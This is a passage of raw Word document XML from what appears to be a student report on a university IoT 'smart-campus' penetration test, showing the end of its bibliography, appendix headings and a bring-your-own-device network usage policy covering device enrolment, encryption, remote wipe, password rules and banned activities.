        <w:t xml:space="preserve">Offensive-Security, “Kali Linux | Penetration Testing and Ethical Hacking Linux </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Distribution,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kali.org</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2018. [Online]. Available: https://www.kali.org/. [Accessed: 23-May-2018].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6A568B" w14:textId="77777777" w:rsidR="004972EB" w:rsidRPr="004972EB" w:rsidRDefault="004972EB" w:rsidP="004972EB">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="640" w:hanging="640"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[69]</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>R. Ford and W. H. Allen, “Malware shall greatly increase</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>⋯</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,” </w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IEEE Secur. Priv.</w:t>
      </w:r>
      <w:r w:rsidRPr="004972EB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2009.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2F2ED4" w14:textId="0F21B792" w:rsidR="004972EB" w:rsidRPr="004972EB" w:rsidRDefault="004972EB" w:rsidP="004972EB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="736C1D6B" w14:textId="09C11778" w:rsidR="00403E69" w:rsidRDefault="00FB10C7" w:rsidP="002A443D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bibliography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAE00ED" w14:textId="77777777" w:rsidR="00A03BF2" w:rsidRDefault="00A03BF2" w:rsidP="002A443D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6362DB93" w14:textId="7987C630" w:rsidR="00555D25" w:rsidRDefault="00555D25" w:rsidP="002A443D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Appendix -A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB2961" w14:textId="77777777" w:rsidR="009B46EF" w:rsidRPr="009B46EF" w:rsidRDefault="009B46EF" w:rsidP="009B46EF">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7083E6DB" w14:textId="28F051BA" w:rsidR="00CC313A" w:rsidRDefault="00CC313A" w:rsidP="00CC313A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC313A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>UWTSD IoT ‘Smart-Campus’ PT Topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3147FA" w14:textId="4828988E" w:rsidR="00555D25" w:rsidRPr="004972EB" w:rsidRDefault="00555D25" w:rsidP="004972EB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29274092" w14:textId="7804EE41" w:rsidR="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Appendix-</w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD1134A" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="009B46EF" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C76316F" w14:textId="6E248AD4" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00C60BEB" w:rsidP="00555D25">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">UWTSD IoT Smart – Campus </w:t>
      </w:r>
      <w:r w:rsidR="00555D25" w:rsidRPr="00555D25">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Network </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage </w:t>
      </w:r>
      <w:r w:rsidR="00555D25" w:rsidRPr="00555D25">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D533E9A" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:spacing w:line="120" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D95542B" w14:textId="066E47EA" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>AT UWTSD</w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve"> we promote </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a Bring Your Own Device Scheme (BYOD) </w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:t>and give staff</w:t>
      </w:r>
      <w:r>
        <w:t>/students</w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve"> the privilege to use their personal devices to access the </w:t>
      </w:r>
      <w:r w:rsidR="005D4683">
        <w:t>university</w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve"> network after they have been approved, enrolled and secured for use by the network </w:t>
      </w:r>
      <w:r w:rsidR="005D4683">
        <w:t>security engineering</w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve"> team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176C50F6" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="316AAF3B" w14:textId="19846F9B" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve">Once the devices have been enrolled and added to the </w:t>
      </w:r>
      <w:r w:rsidR="005D4683">
        <w:t>Mobile Device Management (MDM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve"> database of approved personal devices</w:t>
      </w:r>
      <w:r w:rsidR="005D4683">
        <w:t xml:space="preserve">, UWTSD </w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:t>reserves the right to administer and monitor the device whilst connected to the company’s network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D1374F" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4943B97A" w14:textId="68A9E298" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve">All personal devices approved by the network team will be given a free installation of </w:t>
      </w:r>
      <w:r w:rsidR="005D4683">
        <w:t>Norton</w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D4683">
        <w:t xml:space="preserve">Endpoint </w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve">Security which includes </w:t>
      </w:r>
      <w:r w:rsidR="005D4683" w:rsidRPr="00555D25">
        <w:t>firewall, anti</w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve">-malware and email </w:t>
      </w:r>
      <w:r w:rsidR="005D4683">
        <w:t>scanner</w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve"> which will be administered remotely by </w:t>
      </w:r>
      <w:r w:rsidR="005D4683">
        <w:t>the UWTSD network security team</w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:t>. This also includes Operating System updates and software patches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462F46C0" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EBA0DE4" w14:textId="2EDC796C" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>User network access privileges will be applied to devices in accordance to staff/</w:t>
      </w:r>
      <w:r w:rsidR="005D4683">
        <w:t>student’s network privileges depending on the module course he/she is enrolled/teaching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B3AB02" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B45AFF" w14:textId="30946DCF" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve">All </w:t>
      </w:r>
      <w:r w:rsidR="005D4683">
        <w:t>UWTSD</w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve"> data that is accessed and stored on a personal device will be encrypted on a local directory within the device and will only be accessible whilst connected to the company’s network both on-site or off-site depending on the security level of the data being accessed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F13B85D" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52948573" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>Data tagged as highly sensitive will only be accessible whilst connected internally to the company’s network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D0796D" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:ind w:left="575"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26CF0C9D" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>All other data will only be accessible whilst connected either to the internal network or externally via the company’s VPN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7023977B" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20774F95" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>All company data stored on personal devices can be deleted (wiped) remotely by the networking team in such cases of devices becoming lost/stolen or an employee’s contract has ended with the company.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C34D163" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="315176AB" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve">All USB ports will be disabled whilst the device is connected to the company’s network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D423E56" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="115E3646" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>Approved devices and Operating Systems for use within the company network are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6654C46A" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CFFFE0F" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>Devices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C26056" w14:textId="251DF54F" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="005D4683" w:rsidP="00600BFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005D4683">
        <w:t>Samsung – Smartphone and tablets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDACA72" w14:textId="1E186935" w:rsidR="00555D25" w:rsidRDefault="00555D25" w:rsidP="00600BFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>Windows – Smartphone and tablet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52418409" w14:textId="13CFF6C2" w:rsidR="00600BFF" w:rsidRPr="00555D25" w:rsidRDefault="00600BFF" w:rsidP="00600BFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>Apple – Smartphone and tablet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2C2D33" w14:textId="104E8F15" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00600BFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>All Laptops running compatible OS’s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCEF8A3" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E25497A" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>Operating Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17809302" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:spacing w:line="120" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A94645B" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00600BFF">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>1. Windows 10 or above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DACC7A" w14:textId="54C15D13" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00600BFF">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00600BFF" w:rsidRPr="00600BFF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00600BFF" w:rsidRPr="00555D25">
        <w:t>Android Enterprise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E340DC" w14:textId="229855FE" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00600BFF">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="00600BFF" w:rsidRPr="00555D25">
        <w:t>Apple IOS 11 or above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3BF7E8" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DA28422" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>All personal devices and user accounts will be required to set an Alphanumeric password with a minimum of 8 characters which must include at least one uppercase character and symbol. Users will be prompted to change their device/network password every 30 days.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB3C1C7" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="411DB653" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>A screen lock will also be enforced on all personal devices if the device is left unattended for longer than 3 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE86F7C" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F09C004" w14:textId="6E2C8DFB" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>All end users (</w:t>
      </w:r>
      <w:r w:rsidR="005D4683">
        <w:t>students and staff</w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve">) who access the network are </w:t>
      </w:r>
      <w:r w:rsidR="005D4683">
        <w:t>instructed</w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve"> to follow the network usage policy’s and have a responsibility for all activity of personally owned devices used within </w:t>
      </w:r>
      <w:r w:rsidR="005D4683">
        <w:t xml:space="preserve">the UWTSD </w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:t>network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04181660" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1F07D7" w14:textId="63863739" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve">The use of personal E-mail i.e. G-Mail, Outlook, within the </w:t>
      </w:r>
      <w:r w:rsidR="005D4683">
        <w:t>UWTSD network</w:t>
      </w:r>
      <w:r w:rsidRPr="00555D25">
        <w:t xml:space="preserve"> is not permitted and access to these sites will be blocked whilst connected to the </w:t>
      </w:r>
      <w:r w:rsidR="005D4683" w:rsidRPr="00555D25">
        <w:t>network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607C87F7" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2478E5CD" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>Serious network policy breaches include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D149F7F" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B37A38E" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>Viewing company banned websites using a proxy server or by any other means which includes; illicit and/or criminal material i.e. Pornography, violence, terrorism drugs of any kind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108A3EF4" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:ind w:left="575"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="229DCB3E" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>Accessing domains, directories, data and devices without authorisation using hacking tools or software deigned to breach network security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8AD0A2" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7298CA" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555D25">
        <w:t>Any Tampering and/or removal of the company owned software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795C5139" w14:textId="77777777" w:rsidR="00555D25" w:rsidRPr="00555D25" w:rsidRDefault="00555D25" w:rsidP="00555D25">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
